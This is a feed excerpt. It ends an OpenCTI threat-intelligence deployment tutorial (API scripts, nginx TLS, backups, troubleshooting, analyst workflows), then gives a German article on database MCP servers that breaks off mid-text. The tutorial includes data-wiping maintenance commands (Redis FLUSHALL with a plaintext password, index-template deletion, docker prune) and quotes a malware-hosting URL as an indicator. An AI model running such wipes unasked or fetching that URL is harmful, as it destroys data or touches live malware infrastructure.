/home/andrey/openCTI/.env | cut -d= -f2)<br>for rule in $RULES; do<br>  curl -s -X POST http://localhost:8080/graphql \<br>    -H "Authorization: Bearer $TOKEN" \<br>    -H "Content-Type: application/json" \<br>    -d "{\"query\":\"mutation { ruleSetActivation(id: \\\"$rule\\\", enable: true) { id activated } }\"}" \<br>    | python3 -c "import sys,json; d=json.load(sys.stdin); print('$rule:', d['data']['ruleSetActivation']['activated'])"<br>done</pre><p><strong>What these rules do automatically once data arrives:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*epLGa3gwJILd0FyMKdsQQg.png"></figure><p>RuleEffectattribution_attributionIf APT-X is attributed to Country-A, and APT-Y is a sub-group of APT-X → APT-Y also attributed to Country-Asighting_incidentIf an indicator is sighted, automatically raise an Incidentindicate_sightedIf indicator is sighted → infer the targeted entity from the indicator's relationshipreport_ref_indicator_based_onIf a Report references Observable X, and X has an Indicator → auto-link the Indicator to the Reportobservable_relatedIf two objects share a common Observable → infer a related-to relationshipparent_technique_useIf a sub-technique (T1059.001) is used → auto-link parent technique (T1059) as used</p><p><strong>For custom event-driven automation in CE</strong>, use a pycti script or the AI connector (section 9.1). The pycti library supports streaming the live event feed via helper.listen() — the AI connector in 9.1 uses exactly this pattern.</p><h3>10. Post-Deployment Hardening</h3><h4>10.1 Reverse Proxy with TLS (nginx)</h4><pre># /etc/nginx/sites-available/opencti<br>server {<br>    listen 443 ssl http2;<br>    server_name opencti.yourdomain.com;<br>ssl_certificate     /etc/letsencrypt/live/opencti.yourdomain.com/fullchain.pem;<br>    ssl_certificate_key /etc/letsencrypt/live/opencti.yourdomain.com/privkey.pem;<br>    ssl_protocols       TLSv1.2 TLSv1.3;<br>    ssl_ciphers         ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384;<br>    location / {<br>        proxy_pass         http://127.0.0.1:8080;<br>        proxy_set_header   Host $host;<br>        proxy_set_header   X-Real-IP $remote_addr;<br>        proxy_set_header   X-Forwarded-For $proxy_add_x_forwarded_for;<br>        proxy_set_header   X-Forwarded-Proto $scheme;<br>        proxy_read_timeout 300s;<br>        client_max_body_size 100m;<br>    }<br>}<br>server {<br>    listen 80;<br>    server_name opencti.yourdomain.com;<br>    return 301 https://$host$request_uri;<br>}</pre><h4>10.2 Backup Strategy</h4><pre>#!/bin/bash<br># /home/andrey/openCTI/scripts/backup.sh<br>set -euo pipefail<br>BACKUP_DIR="/mnt/backup/opencti/$(date +%Y%m%d_%H%M%S)"<br>mkdir -p "$BACKUP_DIR"<br># Snapshot ElasticSearch<br>curl -s -u elastic:${ELASTIC_PASSWORD} \<br>  -X PUT "http://localhost:9200/_snapshot/backup/snapshot_$(date +%Y%m%d)" \<br>  -H 'Content-Type: application/json' \<br>  -d '{"indices": "*", "ignore_unavailable": true}'<br># Dump MinIO (reports, files)<br>docker run --rm \<br>  --network opencti_network \<br>  -v "$BACKUP_DIR:/backup" \<br>  minio/mc:latest \<br>  mirror myminio/opencti /backup/minio/<br>echo "Backup completed: $BACKUP_DIR"</pre><h4>10.3 Security Checklist</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*hjQWso4p7MIiBfcRr15oZw.png"></figure><ul><li>Change all default passwords in .env</li><li>Generate unique UUID4 tokens for every connector</li><li>Enable TLS via nginx reverse proxy</li><li>Restrict port 8080 to localhost only (127.0.0.1:8080:8080)</li><li>Enable ElasticSearch authentication (already configured above)</li><li>Set up fail2ban on the nginx access log</li><li>Rotate OPENCTI_ADMIN_TOKEN every 90 days</li><li>Review TLP markings — ensure nothing RED leaks via TAXII</li><li>Enable audit logging: APP__APP_LOGS__LOGS_LEVEL: info</li></ul><h3>11. Operational Runbook</h3><h4>Day 1 — Initial Data Load</h4><pre># MITRE ATT&amp;CK loads first (foundational framework)<br># Wait ~10 minutes for it to complete, then verify:<br>TOKEN=$(grep OPENCTI_ADMIN_TOKEN /home/andrey/openCTI/.env | cut -d= -f2)<br><br>curl -s -X POST http://localhost:8080/graphql \<br>  -H "Authorization: Bearer $TOKEN" \<br>  -H "Content-Type: application/json" \<br>  -d '{"query": "{ attackPatterns { edges { node { name } } } }"}' | \<br>  python3 -c "import sys,json; d=json.load(sys.stdin); print('Techniques loaded:', len(d['data']['attackPatterns']['edges']))"<br># Should return 500+ techniques</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*V2XGUwLrUpe1XNLUono5Ng.png"></figure><h4>Common Operations</h4><pre># Check all connector health<br>docker compose -f docker-compose.connectors.yml ps<br># View connector logs<br>docker compose -f docker-compose.connectors.yml logs --tail=50 connector-alienvault<br># Restart a stuck connector<br>docker compose -f docker-compose.connectors.yml restart connector-malwarebazaar<br># Scale workers for high ingest load<br>docker compose -f docker-compose.yml up -d --scale worker=5<br># Check ElasticSearch cluster health<br>curl -s -u elastic:${ELASTIC_PASSWORD} http://localhost:9200/_cluster/health?pretty<br># Check RabbitMQ queue depth (should stay near 0 at rest)<br>docker exec $(docker ps -qf name=rabbitmq) rabbitmqctl list_queues name messages</pre><h4>Monitoring Metrics to Watch</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*dn9gJsZa98wedqD6PdcrQA.png"></figure><h4>Quick Reference</h4><pre># Start everything<br>cd /home/andrey/openCTI<br>docker network create opencti_network 2&gt;/dev/null || true<br>docker compose -f docker-compose.yml up -d<br>docker compose -f docker-compose.connectors.yml up -d<br>docker compose -f docker-compose.ai.yml up -d<br># Stop everything<br>docker compose -f docker-compose.ai.yml down<br>docker compose -f docker-compose.connectors.yml down<br>docker compose -f docker-compose.yml down<br># Access<br># UI:      http://localhost:8080<br># API:     http://localhost:8080/graphql<br># MinIO:   http://localhost:9001<br># RabbitMQ: http://localhost:15672</pre><h3>12. Troubleshooting</h3><h3>Known Issues — OpenCTI 6.2.0 + ElasticSearch 8.13</h3><h4>ILM Race Condition (resource_already_exists_exception)</h4><p>ES 8.13’s ILM daemon auto-bootstraps rollover indices the moment an index template with lifecycle.rollover_alias is created. OpenCTI's elCreateIndex does a check-then-create which loses the race. This kills initialization and loops with restart: always.</p><p><strong>Fix already applied:</strong> patches/back.js is mounted over the compiled bundle and makes elCreateIndex idempotent — it catches resource_already_exists_exception and returns null.</p><p><strong>Re-initialization procedure</strong> (if ES volume is dropped):</p><pre># 1. Delete any leftover index templates from a failed run<br>curl -s -u elastic:${ELASTIC_PASSWORD} -X DELETE \<br>  "http://localhost:9200/_index_template/opencti*"</pre><pre># 2. Flush Redis state<br>docker exec opencti-redis-1 redis-cli -a opencti FLUSHALL</pre><pre># 3. Start ES first, wait for green/yellow<br>docker compose up -d elasticsearch<br>until curl -s -u elastic:${ELASTIC_PASSWORD} \<br>  <a href="http://localhost:9200/_cluster/health">http://localhost:9200/_cluster/health</a> | grep -q '"status":"green"\|"status":"yellow"'; do<br>  sleep 5; done</pre><pre># 4. Start the rest — OpenCTI will create 13 indices and load base STIX data (~5-10 min)<br>docker compose up -d</pre><h4>ElasticSearch Disk Watermark (cluster RED, no shard allocation)</h4><p>ES 8.x refuses all shard allocation when disk exceeds 90% high watermark. cluster.routing.allocation.disk.threshold_enabled=false is set in docker-compose.yml.</p><p>To reclaim disk space:</p><pre>docker system prune -a   # frees ~47 GB of unused images/containers</pre><h4>Connectors Can’t Reach opencti Hostname</h4><p>Both compose files must share the same Docker network. docker-compose.yml defines:</p><pre>networks:<br>  default:<br>    name: opencti_network<br>    external: true</pre><p>If the main stack was started without this, run:</p><pre>docker network connect --alias opencti opencti_network opencti-opencti-1</pre><p>Then add the networks: block to docker-compose.yml and run docker compose up -d to make it permanent.</p><h4>OPENCTI_TOKEN vs CONNECTOR_ID</h4><p>Connectors authenticate to OpenCTI using OPENCTI_TOKEN: ${OPENCTI_ADMIN_TOKEN}. The per-connector UUID variables (CONNECTOR_MITRE_TOKEN, etc.) are only used as CONNECTOR_ID — they identify the connector instance in the UI, not for authentication.</p><h4>CVE Connector — Zero Vulnerabilities Imported (NVD API Key Bug)</h4><p>connector-cve:6.2.0 has a bug: it sends the NVD API key as Bearer: &lt;key&gt; in the HTTP header, but NVD 2.0 API requires apiKey: &lt;key&gt;. The connector silently gets a non-200 response and imports nothing. Additionally, CVE_MAX_DATE_RANGE is required but missing from the image's default config — omitting it causes a TypeError: '&gt;' not supported between instances of 'NoneType' and 'int' crash every 60 seconds.</p><p><strong>Fix:</strong> Mount a patched api.py that uses the correct header, and add the missing vars:</p><pre>connector-cve:<br>  image: opencti/connector-cve:6.2.0<br>  volumes:<br>    - ./patches/cve/api.py:/opt/opencti-connector-cve/services/client/api.py:ro<br>  environment:<br>    CVE_MAX_DATE_RANGE: 120<br>    CVE_MAINTAIN_DATA: "true"<br>    # ... other vars</pre><p>patches/cve/api.py — change header from "Bearer": api_key to "apiKey": api_key:</p><pre>headers = {"User-Agent": header}<br>if api_key:<br>    headers["apiKey"] = api_key</pre><h3>13. Usage Examples</h3><h4>13.1 Standard OpenCTI Workflows</h4><h4>Example 1 — Investigate an IP address</h4><p>You received an alert from your SIEM about suspicious outbound traffic to 103.113.70.102.</p><p><strong>In OpenCTI UI:</strong></p><pre>Search → type 103.113.70.102</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*2k7QE2Urnr8tw_xJ2MyAPA.png"></figure><p>If AlienVault or URLhaus has seen it, you’ll find:</p><ul><li>Which threat actor uses this IP as C2</li><li>What malware family communicates with it</li><li>When it was first/last observed</li><li>TLP marking and confidence score</li><li>All reports that mention it</li></ul><p><strong>Via API:</strong></p><pre>TOKEN=$(grep OPENCTI_ADMIN_TOKEN /home/andrey/openCTI/.env | cut -d= -f2)<br>curl -s -X POST http://localhost:8080/graphql \<br>  -H "Authorization: Bearer $TOKEN" \<br>  -H "Content-Type: application/json" \<br>  -d '{"query": "{ stixCyberObservables(filters: {mode: and, filters: [{key: \"value\", values: [\"https://103.113.70.102/bin/support.client.exe\"]}], filterGroups: []}) { edges { node { id entity_type ... on Url { value } } } } }"}' | python3 -m json.tool</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fe53xHSxwntH5knkGjSO6g.png"></figure><h4>Example 2 — Build an APT profile</h4><p>You want to understand everything known about Lazarus Group before a threat briefing.</p><pre><br>Threats → Intrusion Sets → search "Lazarus"</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*S-QNk2tNF4lgs9q6-YaTUQ.png"></figure><p>The profile shows:</p><ul><li><strong>Attributed to:</strong> North Korea</li><li><strong>Motivations:</strong> Financial gain, Espionage</li><li><strong>Targets:</strong> Finance, Cryptocurrency, Defense</li><li><strong>Malware used:</strong> WannaCry, Hermes, BLINDINGCAN (all auto-linked by MITRE connector)</li><li><strong>Techniques:</strong> 80+ ATT&amp;CK techniques with usage relationships</li><li><strong>Campaigns:</strong> Operation AppleJeus, Dream Job, etc.</li><li><strong>Timeline:</strong> chronological view of all activity</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Gmvuu4OUs0uIgRZDt9p3fA.png"></figure><p>Click <strong>“ATT&amp;CK Patterns”</strong> tab → heatmap showing which techniques Lazarus uses most.</p><h4>Example 3 — Import a threat report (PDF / blog post)</h4><p>You found a Mandiant or CrowdStrike blog post about a new campaign.</p><pre>Data → Import → drag and drop the PDF or paste the URL<br>Select format: "Auto detect" or "Report"</pre><p>OpenCTI parses it and creates a Report object. The AI enrichment connector then picks it up automatically and extracts:</p><ul><li>Threat actors mentioned</li><li>Malware families</li><li>ATT&amp;CK technique IDs</li><li>Targeted sectors and countries</li></ul><p>All as STIX relationships, visible immediately in the UI.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*zPViHJ6GKjMeHMtM8240gg.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*YQBdTFlcQ_q9NcblRik5pw.png"></figure><h4>Example 4 — Track a CVE across your environment</h4><p>CVE-2024–21762 (Fortinet FortiOS RCE) was just published. Check what you know about it.</p><pre>Arsenal → Vulnerabilities → search "CVE-2024-21762"</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*G9LM5wxYywcTYVdLC331jw.png"></figure><p>After the CVE connector syncs, you’ll see:</p><ul><li>CVSS score and vector</li><li>Affected software versions</li><li>Which threat actors exploit it (once AlienVault/MITRE data arrives)</li><li>Which campaigns used it</li><li>Related indicators (IPs, domains used in exploitation)</li></ul><h4>Example 5 — Create an incident from a sighting</h4><p>Your EDR detected Cobalt Strike beacon on a workstation.</p><pre>Activities → Incidents → Create<br>  Name: "CS beacon on WS-042"<br>  Type: "Intrusion"<br>  Confidence: 90<br>  Add object: link to Cobalt Strike (malware)<br>  Add object: link to T1071.001 (C2 over HTTP)<br>  Add observable: add the C2 IP</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Zm8Mi5l-QnFsTb0jAia32A.png"></figure><p>With sighting_incident rule enabled, future detections of the same C2 IP automatically raise new incidents without manual work.</p><h4>Example 6 — Export IOCs to your firewall / SIEM</h4><p>You want a live blocklist of all HIGH confidence IPv4 indicators.</p><pre>Data → Indicators<br>Filter: Score &gt; 70, Type = IPv4-Addr, Valid until &gt; today<br>Export → CSV or STIX</pre><p>Or use the built-in <strong>TAXII 2.1 server</strong> to push directly to your SIEM:</p><pre>Settings → Taxii Server → Create collection "High confidence IOCs"<br>Configure your SIEM to poll: http://localhost:8080/taxii2/</pre><h4>Example 7 — Map your detection coverage against ATT&amp;CK</h4><p>You want to know which techniques you detect vs which you’re blind to.</p><pre>Technics → Attack Patterns<br>Filter by: used by (Lazarus Group)</pre><p>Cross-reference the list with your SIEM detection rules. Techniques with no detection rule = gap in coverage.</p><p>Export the filtered list as CSV and import into ATT&amp;CK Navigator for a visual heatmap of covered vs uncovered techniques.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*mPwgsMfkEtXK1y1rnlj0Hw.png"></figure><h4>Example 8 — Pivot from malware to infrastructure</h4><p>You found a Ryuk ransomware sample (SHA256 hash).</p><pre>Search → paste the SHA256</pre><p>From the malware object, pivot to:</p><ul><li><strong>Related indicators</strong> → domains and IPs used for C2</li><li><strong>Used by</strong> → Wizard Spider (threat actor)</li><li><strong>Campaigns</strong> → which ransomware campaigns used this variant</li><li><strong>Techniques</strong> → T1486 (Data Encrypted for Impact), T1490 (Inhibit System Recovery)</li></ul><p>Each pivot is one click in the graph view.</p><h4>Example 9 — Share intelligence with a partner org</h4><p>You want to share a report with a partner but strip out RED-marked internal data.</p><pre>Open the report → Actions → Share<br>Select TLP level: TLP:AMBER (only partner can see it)</pre><p>Or use <strong>Workspaces → Sharing groups</strong> to create a federated share with another OpenCTI instance. All objects above RED are automatically excluded from the export.</p><h4>Example 10 — Build a custom dashboard for your sector</h4><p>Your org is in Finance. You want a live dashboard showing threats to your sector.</p><pre>Home → Dashboards → Create dashboard "Finance Threat Landscape"<br>Add widgets:<br>  - "Threat actors targeting Finance" (bar chart)<br>  - "Most used techniques against Finance" (ATT&amp;CK heatmap)<br>  - "New IOCs last 7 days" (timeline)<br>  - "Active campaigns" (list)<br>  - "CVEs affecting banking software" (table)</pre><p>Each widget auto-updates as new data arrives from connectors.</p><h4>If you like this research, <a href="https://www.paypal.com/donate/?business=W3XDKS7J9XTCG&amp;no_recurring=0&amp;item_name=Buy+me+a+coffee+%28PayPal%29+%E2%80%94+Keep+the+lab+running&amp;currency_code=USD">buy me a coffee (PayPal) — Keep the lab running</a></h4><h3>Follow for practical cybersecurity research</h3><p>If you’re interested in <strong>Offensive security,</strong> <strong>AI security, real-world attack simulations, CTI, and detection engineering</strong> — this is exactly what I focus on.</p><h4>Stay connected:</h4><p>→ <strong>Subscribe on Medium:</strong> <a href="https://medium.com/@1200km">medium.com/@1200km</a><br>→ <strong>Connect on LinkedIn:</strong> <a href="https://www.linkedin.com/in/andrey-pautov/">andrey-pautov</a><br>→ <strong>GitHub — tools &amp; labs:</strong> <a href="https://github.com/anpa1200">github.com/anpa1200</a><br>→ <strong>Contact:</strong> <a href="mailto:1200km@gmail.com">1200km@gmail.com</a></p><h4>Andrey Pautov</h4><p>Follow My Work</p><p>I publish practical cybersecurity research, CTI workflows, detection engineering notes, malware analysis projects, OpenCTI work, cloud and Kubernetes security research, AI-assisted security tooling, labs, and technical guides.</p><p>Portfolio / Knowledge Base: <a href="https://1200km.com/">https://1200km.com/</a><br>Medium: <a href="https://medium.com/@1200km">https://medium.com/@1200km</a><br>GitHub: <a href="https://github.com/anpa1200">https://github.com/anpa1200</a><br>LinkedIn: <a href="https://www.linkedin.com/in/andrey-pautov/">https://www.linkedin.com/in/andrey-pautov/</a></p><p>Andrey Pautov</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=057c9b4b9394" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/the-intelligent-shield-057c9b4b9394">The Intelligent Shield. OpenCTI</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[MCP-Server für Datenbanken]]></title>
<description><![CDATA[Datenbanken in KI-Workflows einzubinden, ist kein Problem – den richtigen MCP-Server vorausgesetzt.DC Studio | shutterstock.com



Das Model Context Protocol (MCP) hat sich zur Standard-Schnittstelle zwischen LLM-gestützten Tools und lokalen Systemen, internen und externen APIs sowie Datenquellen...]]></description>
<link>https://tsecurity.de/de/3597947/it-security-nachrichten/mcp-server-fuer-datenbanken/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3597947/it-security-nachrichten/mcp-server-fuer-datenbanken/</guid>
<pubDate>Mon, 15 Jun 2026 06:07:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/DC-Studio_shutterstock_2628162685_16z9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="AI Dev 16z9" class="wp-image-4183528" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Datenbanken in KI-Workflows einzubinden, ist kein Problem – den richtigen MCP-Server vorausgesetzt.</figcaption></figure><p class="imageCredit">DC Studio | shutterstock.com</p></div>



<p>Das Model Context Protocol (<a href="https://www.computerwoche.de/article/4031227/was-ist-model-context-protocol.html" target="_blank">MCP</a>) hat sich zur Standard-Schnittstelle zwischen LLM-gestützten Tools und lokalen Systemen, internen und externen APIs sowie Datenquellen entwickelt. Offizielle MCP-Server stehen inzwischen nicht nur für <a href="https://www.computerwoche.de/article/4133146/5-mcp-server-fur-mehr-cloud-automation.html" target="_blank">große Cloud-Plattformen</a> und <a href="https://www.computerwoche.de/article/4103988/10-mcp-server-fur-devops.html" target="_blank">DevOps-Tools</a> zur Verfügung, sondern werden auch von den meisten wichtigen Datenbankplattformen unterstützt.</p>



<p>Einen MCP-Server für Datenbanken zu nutzen, kann Anwender unter anderem dazu befähigen,</p>



<ul class="wp-block-list">
<li>Abfragen durchzuführen, Daten zu erstellen und zu aktualisieren sowie administrative Tasks zu erledigen, ohne manuell SQL schreiben zu müssen.</li>



<li>mit LLMs neuen Code zu schreiben oder Automatisierungen zu erstellen, die auf das jeweilige Datenbankschema abgestimmt sind.</li>



<li>das Debugging über schnellere Abfragen optimieren, um Datenprobleme oder Fehlkonfigurationen aufzudecken.</li>
</ul>



<p>In diesem Beitrag stellen wir ihnen offizielle MCP-Server von führenden Datenbank-Plattformanbietern vor. Diese Server können von jedem MCP-kompatiblen Tool, jeder IDE und jedem Agenten genutzt werden. Das erfordert oft nur einen kleinen JSON-Eintrag in der MCP-Konfigurationsdatei.</p>



<h2 class="wp-block-heading">Amazon Aurora MCP-Server</h2>



<p><a href="https://www.computerwoche.de/article/4144155/mysql-weiter-unter-oracle-fuchtel.html" target="_blank">MySQL</a> und <a href="https://www.computerwoche.de/article/3508938/so-geht-postgresql.html" target="_blank">PostgreSQL</a> sind die weltweit am häufigsten verwendeten Open-Source-Datenbanken. In beiden Fällen existiert jedoch kein einheitlicher MCP-Server. Dafür gibt es diese bei verschiedenen Anbietern. Einer davon ist Amazon Web Services (AWS).</p>



<p>Das Unternehmen bietet für seinen gemanagten relationalen Datenbank-Service Aurora einen offiziellen MCP-Server an. Dieser ist sowohl mit MySQL als auch mit PostgreSQL kompatibel. Laut der <a href="https://github.com/awslabs/mcp/tree/main/src/mysql-mcp-server" target="_blank" rel="noreferrer noopener">Dokumentation auf GitHub</a> kann der <a href="https://awslabs.github.io/mcp/servers/mysql-mcp-server" target="_blank" rel="noreferrer noopener">Amazon Aurora MySQL MCP-Server</a> dazu genutzt werden, natürlichsprachliche Befehle in MySQL-kompatible SQL-Abfragen umzuwandeln. Diese können anschließend auf Aurora-MySQL-Datenbanken ausgeführt werden. In ähnlicher Weise bietet der <a href="https://github.com/awslabs/mcp/tree/main/src/postgres-mcp-server" target="_blank" rel="noreferrer noopener">Aurora Postgres MCP-Server</a> MCP-Tools, um mit PostgreSQL-Datenbanken zu arbeiten. Für verteilte Postgres-Datenbanken übernimmt der <a href="https://github.com/awslabs/mcp/tree/main/src/aurora-dsql-mcp-server" target="_blank" rel="noreferrer noopener">Aurora DSQL MCP-Server</a> dieselbe Funktion.</p>



<p>AWS hat darüber hinaus ein <a href="https://github.com/awslabs/mcp" target="_blank" rel="noreferrer noopener">wachsendes Portfolio mit offiziellen MCP-Servern</a> für seine gesamte Produktpalette aufgebaut – darunter auch andere Amazon-Datenbankplattformen wie:</p>



<ul class="wp-block-list">
<li><a href="https://awslabs.github.io/mcp/servers/dynamodb-mcp-server" target="_blank" rel="noreferrer noopener">DynamoDB</a>,</li>



<li><a href="https://awslabs.github.io/mcp/servers/elasticache-mcp-server" target="_blank" rel="noreferrer noopener">ElastiCache</a> und</li>



<li><a href="https://awslabs.github.io/mcp/servers/redshift-mcp-server" target="_blank" rel="noreferrer noopener">Redshift</a>.</li>
</ul>



<p><strong>Zu empfehlen für:</strong> AWS-agnostische Anwender, die ihre LLM-Interaktionen mit Daten unterfüttern wollen.</p>



<h2 class="wp-block-heading">BigQuery MCP-Server</h2>



<p>BigQuery ist Googles Cloud-basierte Datenanalyseplattform und eine beliebte Datenquelle für KI-Anwendungen. BigQuery-Nutzer mit konfiguriertem API-Zugriff können den <a href="https://docs.cloud.google.com/bigquery/docs/use-bigquery-mcp" target="_blank" rel="noreferrer noopener">BigQuery MCP Server</a> nutzen, um über MCP-kompatible KI-Clients mit der Plattform zu interagieren. Mithilfe dieses Remote-MCP-Servers können Entwickler:</p>



<ul class="wp-block-list">
<li>Abfragen zu Datenquellen generieren und ausführen oder</li>



<li>Metadaten zu Datensätzen, Tabellen und Schemata abrufen.</li>
</ul>



<p>All das ist mit einem einfachen Prompt in natürlicher Sprache realisierbar, beispielsweise: „Liste alle Datensätze im Projekt <code>PROJECT_ID</code> auf.“ Die Ergebnisse lassen sich nach Region, Datensatz-ID, Spaltennamen und weiteren Kriterien filtern. Als Teil von Googles vollständig gemanagtem, remote gehostetem MCP-Portfolio kann der BigQuery MCP Server verteilten Teams das Leben in Bezug auf Security, Wartung und Benutzerfreundlichkeit leichter machen. Allerdings unterliegen die BigQuery-MCP-Tools einigen Beschränkungen hinsichtlich des Umfangs der Abfrageergebnisse, der Verarbeitungszeit und anderen Faktoren.</p>



<p><strong>Zu empfehlen für:</strong> Anwender, die bereits auf BigQuery setzen und zusätzliche, agentische Kontrollmaßnahmen wünschen.</p>



<h2 class="wp-block-heading">Elastic Agent Builder</h2>



<p>Eine weitere wichtige Datenbankkategorie umfasst Plattformen, die für Keyword- und semantische Suchen konzipiert sind. In diesem Bereich wird häufig Elasticsearch eingesetzt. Anstelle eines einzelnen MCP-Servers bietetdas Unternehmen inzwischen den <a href="https://www.elastic.co/docs/explore-analyze/ai-features/elastic-agent-builder" target="_blank" rel="noreferrer noopener">Elastic Agent Builder</a> an. Dabei handelt es sich um ein umfassenderes Framework, das auf agentenbasierte Workflows ausgerichtet ist.</p>



<p>Mit dem Elastic Agent Builder können Anwender mit KI-Agenten chatten, um Kontext aus den Elasticsearch-Daten abzurufen und diesen auf verschiedene Umgebungen auszuweiten. Der Agent Builder selbst enthält einen <a href="https://www.elastic.co/docs/explore-analyze/ai-features/agent-builder/mcp-server" target="_blank" rel="noreferrer noopener">MCP-Server-Endpunkt</a> für die Programmability und um Agenten anderen Clients zugänglich zu machen. Hierbei handelt es sich ausdrücklich<strong> nicht</strong> um eine direkte MCP-Schnittstelle zu den reinen Elasticsearch-APIs. Stattdessen stellt das Interface Skills der Agentenplattform bereit.</p>



<p>Ein möglicher Nachteil ist dabei, dass dadurch eine zusätzliche Ebene zwischen IDE (beziehungsweise Agenten) und den Daten, nach denen gesucht wird, eingezogen wird. Einen Agenten einzurichten, erfordert eine höhere Abonnement-Stufe und im Vergleich zu anderen MCP-Servern sind zusätzliche Konfigurationsschritte erforderlich.</p>



<p><strong>Zu empfehlen für:</strong> Anwender, die Wert auf eine erweiterbare gemeinsame Ebene für die Interaktion sowohl mit Elasticsearch als auch mit externen MCP-Servern legen und gleichzeitig Verantwortlichkeiten wie Berechtigungen zentralisieren möchten.</p>



<h2 class="wp-block-heading">Neo4j MCP-Server</h2>



<p>Graph-Datenbanken sind inzwischen ebenfalls ein wichtiger NoSQL-Datenbanktyp. Dieser ist darauf spezialisiert, mithilfe von Nodes und Edges Abfragen in stark vernetzten Datenstrukturen zu beschleunigen. Eine populäre Option in diesem Bereich ist Neo4j. Der zugehörige <a href="https://neo4j.com/developer/genai-ecosystem/model-context-protocol-mcp/">offizielle MCP-Server</a> funktioniert mit jeder Art von Neo4j-Deployment (Desktop, Sandbox, selbstverwaltet und gemanagt) und ermöglicht es LLM-basierten Clients unter anderem:</p>



<ul class="wp-block-list">
<li>Graph-Schemata abzurufen,</li>



<li>Lese- und Schreibanweisungen auszuführen, oder</li>



<li>Graph-Algorithmen auszuführen.</li>
</ul>



<p>Darüber hinaus sind weitere Neo4j-MCP-Server für spezielle Anwendungsbereiche <a href="https://github.com/neo4j-contrib/mcp-neo4j" target="_blank" rel="noreferrer noopener">verfügbar</a>.</p>



<p><strong>Zu empfehlen für:</strong> Neo4j-Poweruser, die mit ihren Graph-Datenbanken auf chatbasierte Weise experimentieren möchten.</p>



<h2 class="wp-block-heading">MCP Toolbox for Databases</h2>



<p>Bei <a href="https://github.com/googleapis/mcp-toolbox" target="_blank" rel="noreferrer noopener">MCP Toolbox for Databases</a> handelt es sich um einen bemerkenswerten MCP-Server von Google, der als populäre „Sammellösung“ für verschiedene Datenbanktypen dient. Denn dieser Server verbindet LLMs nicht mit einer einzelnen verwalteten Datenbank, sondern vereinheitlicht den LLM-Zugriff auf mehrere Systeme. Die Open-Source-Utility wird mit <a href="https://mcp-toolbox.dev/documentation/configuration/prebuilt-configs/" target="_blank" rel="noreferrer noopener">vorkonfigurierten Einstellungen</a> für knapp 30 verschiedene Datenbanken ausgeliefert – darunter:</p>



<ul class="wp-block-list">
<li>PostgreSQL,</li>



<li>MySQL,</li>



<li>SQL Server,</li>



<li>Oracle Database,</li>



<li>MongoDB,</li>



<li>Redis,</li>



<li>Neo4j,</li>



<li>Snowflake, sowie</li>



<li>die Datenbanken in Google Cloud.</li>
</ul>



<p>Sobald die Datenquellen in einer <code>tools.yaml</code>-Datei definiert sind, können mit der MCP Toolbox strukturierte Abfragen oder semantische Suchen in Datenbanken durchgeführt werden – direkt über eine IDE oder einen Agentic Client und in natürlicher Sprache. Dabei werden Befehle in Aktionen wie <code>list_tables</code> und <code>execute_sql</code> übersetzt.</p>



<p><strong>Zu empfehlen für: </strong>Anwender, die verschiedene Datenbanken in Google Cloud (oder anderswo) nutzen und einen „All-in-One“-MCP-Server brauchen.</p>



<h2 class="wp-block-heading">MongoDB MCP-Server</h2>



<p><a href="https://www.computerwoche.de/article/2796089/was-die-nosql-datenbank-kann.html" target="_blank">MongoDB</a> ist eine populäre, dokumentenorientierte NoSQL-Datenbank. Die verantwortlichen Entwickler haben ebenfalls einen <a href="https://github.com/mongodb-js/mongodb-mcp-server" target="_blank" rel="noreferrer noopener">offiziellen MCP-Server</a> veröffentlicht. Dieser ist sowohl mit der quelloffenen Datenbank als auch mit der gehosteten Cloud-Datenbankplattform MongoDB Atlas kompatibel. Um mit MongoDB-Instanzen zu interagieren, stellt der MCP-Server eine <a href="https://github.com/mongodb-js/mongodb-mcp-server#tool-list" target="_blank" rel="noreferrer noopener">Reihe von Tools</a> bereit. Damit ist es etwa möglich:</p>



<ul class="wp-block-list">
<li>die Datenbank abzufragen,</li>



<li>Informationen zu Sammlungen abzurufen,</li>



<li>Indizes zu erstellen und zu entfernen, oder</li>



<li>Statistiken zur Datenbanknutzung zu erfassen.</li>
</ul>



<p>Für MongoDB-Atlas-Prozesse stehen zudem weitere Tools zur Verfügung, beispielsweise um Benutzer zu erstellen und zu clustern.  </p>



<p>Die Tools des MongoDB MCP-Servers sind standardmäßig schreibgeschützt, können aber für Schreibzugriff umkonfiguriert werden. Diese können lokal genutzt werden, unterstützen aber auch den Streamable-HTTP-Transport für Remote-Server (was allerdings mit größeren <a href="https://www.computerwoche.de/article/4093704/tools-um-mcp-server-abzusichern.html" target="_blank">Sicherheitsbedenken</a> verbunden ist).</p>



